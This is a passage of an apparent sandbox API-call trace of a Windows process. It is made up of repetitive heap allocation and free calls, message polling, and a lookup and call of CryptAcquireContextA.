HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e505a8 | out: hHeap=0x970000) returned 1 [0180.320] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cf8 | out: hHeap=0x970000) returned 1 [0180.320] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e505c0 | out: hHeap=0x970000) returned 1 [0180.320] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54198 | out: hHeap=0x970000) returned 1 [0180.320] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cb8 | out: hHeap=0x970000) returned 1 [0180.320] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0180.320] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c48 [0180.320] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c48 | out: hHeap=0x970000) returned 1 [0180.320] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0180.320] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7fc00 [0180.320] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c48 [0180.320] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLESET", cchLength=0x14 | out: lpsz="__CRYPT_DLLHANDLESET") returned 0x14 [0180.320] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7fc00 | out: hHeap=0x970000) returned 1 [0180.320] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c48 | out: hHeap=0x970000) returned 1 [0180.320] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50638 [0180.320] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54c48 [0180.320] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50590 [0180.320] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e505a8 [0180.320] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cb8 [0180.320] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cb8 | out: hHeap=0x970000) returned 1 [0180.320] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e505c0 [0180.320] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e542d8 [0180.320] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50608 [0180.320] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cb8 [0180.320] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50608 | out: hHeap=0x970000) returned 1 [0180.320] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54490 [0180.321] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50608 [0180.321] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78c00 [0180.321] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0180.321] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cf8 [0180.321] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cf8 | out: hHeap=0x970000) returned 1 [0180.321] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cf8 [0180.321] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cf8 | out: hHeap=0x970000) returned 1 [0180.321] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0180.321] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78c00 | out: hHeap=0x970000) returned 1 [0180.321] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50608 | out: hHeap=0x970000) returned 1 [0180.321] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54490 | out: hHeap=0x970000) returned 1 [0180.321] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cb8 | out: hHeap=0x970000) returned 1 [0180.321] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e542d8 | out: hHeap=0x970000) returned 1 [0180.321] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e505c0 | out: hHeap=0x970000) returned 1 [0180.321] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c48 | out: hHeap=0x970000) returned 1 [0180.321] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50638 | out: hHeap=0x970000) returned 1 [0180.321] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e505a8 | out: hHeap=0x970000) returned 1 [0180.321] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50590 | out: hHeap=0x970000) returned 1 [0180.321] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0180.321] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50608 [0180.323] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c48 [0180.323] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50638 [0180.323] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50590 [0180.323] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b78 [0180.323] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e542b0 [0180.323] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e505a8 [0180.323] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b38 [0180.323] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e505c0 [0180.323] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508c0 [0180.323] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50608 | out: hHeap=0x970000) returned 1 [0180.323] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c48 | out: hHeap=0x970000) returned 1 [0180.323] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50638 | out: hHeap=0x970000) returned 1 [0180.323] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0180.323] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50608 [0180.323] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b48 [0180.323] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50608 | out: hHeap=0x970000) returned 1 [0180.323] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e540d0 [0180.323] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50608 [0180.323] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50638 [0180.323] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c48 [0180.323] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e542d8 [0180.323] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507a0 [0180.324] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507a0 | out: hHeap=0x970000) returned 1 [0180.324] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50608 | out: hHeap=0x970000) returned 1 [0180.324] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cf8 | out: hHeap=0x970000) returned 1 [0180.324] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50638 | out: hHeap=0x970000) returned 1 [0180.324] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c48 | out: hHeap=0x970000) returned 1 [0180.324] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50848 | out: hHeap=0x970000) returned 1 [0180.324] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e540d0 | out: hHeap=0x970000) returned 1 [0180.324] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b48 | out: hHeap=0x970000) returned 1 [0180.324] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0180.324] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="WIN_8", cchCount1=5, lpString2="WIN_2000", cchCount2=8) returned 3 [0180.324] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509b0 | out: hHeap=0x970000) returned 1 [0180.324] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c48 | out: hHeap=0x970000) returned 1 [0180.324] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50908 | out: hHeap=0x970000) returned 1 [0180.324] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507d0 | out: hHeap=0x970000) returned 1 [0180.324] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69ac8 | out: hHeap=0x970000) returned 1 [0180.324] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cf8 | out: hHeap=0x970000) returned 1 [0180.324] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b48 | out: hHeap=0x970000) returned 1 [0180.324] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0180.324] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0180.324] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7fd50 | out: hHeap=0x970000) returned 1 [0180.324] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b58 | out: hHeap=0x970000) returned 1 [0180.324] PeekMessageW (in: lpMsg=0x8cf048, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf048) returned 0 [0180.324] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b58 | out: hHeap=0x970000) returned 1 [0180.324] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b48 | out: hHeap=0x970000) returned 1 [0180.324] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78618 | out: hHeap=0x970000) returned 1 [0180.324] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50878 | out: hHeap=0x970000) returned 1 [0180.324] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cf8 | out: hHeap=0x970000) returned 1 [0180.324] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cf8 | out: hHeap=0x970000) returned 1 [0180.325] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cf8 | out: hHeap=0x970000) returned 1 [0180.325] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cf8 | out: hHeap=0x970000) returned 1 [0180.325] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50830 | out: hHeap=0x970000) returned 1 [0180.325] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cf8 | out: hHeap=0x970000) returned 1 [0180.325] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b48 | out: hHeap=0x970000) returned 1 [0180.325] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cf8 | out: hHeap=0x970000) returned 1 [0180.325] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cf8 | out: hHeap=0x970000) returned 1 [0180.325] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e541e8 | out: hHeap=0x970000) returned 1 [0180.325] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cf8 | out: hHeap=0x970000) returned 1 [0180.325] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b68 | out: hHeap=0x970000) returned 1 [0180.325] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cf8 | out: hHeap=0x970000) returned 1 [0180.325] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cf8 | out: hHeap=0x970000) returned 1 [0180.325] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cf8 | out: hHeap=0x970000) returned 1 [0180.325] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0180.325] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50770 | out: hHeap=0x970000) returned 1 [0180.325] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b48 | out: hHeap=0x970000) returned 1 [0180.325] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50788 | out: hHeap=0x970000) returned 1 [0180.325] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b58 | out: hHeap=0x970000) returned 1 [0180.326] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50890 | out: hHeap=0x970000) returned 1 [0180.326] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b58 | out: hHeap=0x970000) returned 1 [0180.326] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50788 | out: hHeap=0x970000) returned 1 [0180.326] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b68 | out: hHeap=0x970000) returned 1 [0180.326] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508a8 | out: hHeap=0x970000) returned 1 [0180.326] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b68 | out: hHeap=0x970000) returned 1 [0180.326] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50788 | out: hHeap=0x970000) returned 1 [0180.326] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0180.326] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50878 | out: hHeap=0x970000) returned 1 [0180.326] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0180.326] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50788 | out: hHeap=0x970000) returned 1 [0180.326] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dd8 | out: hHeap=0x970000) returned 1 [0180.326] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50788 | out: hHeap=0x970000) returned 1 [0180.326] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0180.326] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50878 | out: hHeap=0x970000) returned 1 [0180.326] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dd8 | out: hHeap=0x970000) returned 1 [0180.326] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50770 | out: hHeap=0x970000) returned 1 [0180.326] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50770 | out: hHeap=0x970000) returned 1 [0180.326] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ea8 | out: hHeap=0x970000) returned 1 [0180.326] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50788 | out: hHeap=0x970000) returned 1 [0180.326] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d98 | out: hHeap=0x970000) returned 1 [0180.326] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0180.326] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69ac8 [0180.326] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x2e69ac8, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContext", lpUsedDefaultChar=0x0) returned 20 [0180.326] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50878 | out: hHeap=0x970000) returned 1 [0180.326] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54080 [0180.326] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69ac8 | out: hHeap=0x970000) returned 1 [0180.327] GetProcAddress (hModule=0x756e0000, lpProcName="CryptAcquireContext") returned 0x0 [0180.327] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54080 | out: hHeap=0x970000) returned 1 [0180.327] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dd8 | out: hHeap=0x970000) returned 1 [0180.327] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d78 [0180.327] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7fe68 [0180.327] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50830 [0180.327] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e58 [0180.327] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0180.327] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x15) returned 0x2e69988 [0180.327] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x2e69988, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContextA", lpUsedDefaultChar=0x0) returned 21 [0180.327] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50830 | out: hHeap=0x970000) returned 1 [0180.327] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54378 [0180.327] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69988 | out: hHeap=0x970000) returned 1 [0180.327] GetProcAddress (hModule=0x756e0000, lpProcName="CryptAcquireContextA") returned 0x756ffc40 [0180.327] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54378 | out: hHeap=0x970000) returned 1 [0180.327] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e58 | out: hHeap=0x970000) returned 1 [0180.327] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7fe68 | out: hHeap=0x970000) returned 1 [0180.327] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d78 | out: hHeap=0x970000) returned 1 [0180.327] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69bc8 [0180.327] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e08 [0180.327] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ec8 [0180.327] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e68 [0180.327] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e58 [0180.327] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e28 [0180.327] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e08 | out: hHeap=0x970000) returned 1 [0180.328] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0180.328] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e68 | out: hHeap=0x970000) returned 1 [0180.328] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e58 | out: hHeap=0x970000) returned 1 [0180.328] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e28 | out: hHeap=0x970000) returned 1 [0180.328] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69bc8 | out: hHeap=0x970000) returned 1 [0180.328] CryptAcquireContextA (in: phProv=0x8cefd8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x8cefd8*=0xa5f958) returned 1 [0180.329] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x978490 [0180.329] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69988 [0180.329] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e68 [0180.329] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50770 [0180.329] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50878 [0180.329] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50788 [0180.329] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54dc8 [0180.329] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50788 | out: hHeap=0x970000) returned 1 [0180.329] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0180.329] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50878 | out: hHeap=0x970000) returned 1 [0180.329] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508a8 [0180.329] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50788 [0180.329] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50830 [0180.329] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d38 [0180.329] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50830 | out: hHeap=0x970000) returned 1 [0180.329] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d38 | out: hHeap=0x970000) returned 1 [0180.329] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50788 | out: hHeap=0x970000) returned 1 [0180.329] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50788 [0180.329] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50830 [0180.329] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50878 [0180.329] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d78 [0180.329] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50878 | out: hHeap=0x970000) returned 1 [0180.329] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d78 | out: hHeap=0x970000) returned 1 [0180.329] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50830 | out: hHeap=0x970000) returned 1 [0180.330] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50830 [0180.330] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50878 [0180.330] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50890 [0180.330] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e28 [0180.330] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50890 | out: hHeap=0x970000) returned 1 [0180.330] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e28 | out: hHeap=0x970000) returned 1 [0180.330] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50878 | out: hHeap=0x970000) returned 1 [0180.330] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50878 [0180.330] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50890 [0180.330] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a88 [0180.330] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e78 [0180.330] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a88 | out: hHeap=0x970000) returned 1 [0180.330] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e78 | out: hHeap=0x970000) returned 1 [0180.330] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50890 [0180.330] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c98 [0180.330] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c68 [0180.330] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e28 [0180.330] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2e558d8 [0180.330] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0180.330] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cf8 [0180.330] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b48 [0180.330] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b58 [0180.330] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69b68 [0180.330] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b68 [0180.330] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0180.330] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e80060 [0180.331] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c48 [0180.331] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXTSET", cchLength=0x12 | out: lpsz="__CRYPT_CONTEXTSET") returned 0x12 [0180.331] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0180.331] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b48 [0180.331] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0180.331] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0180.331] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: 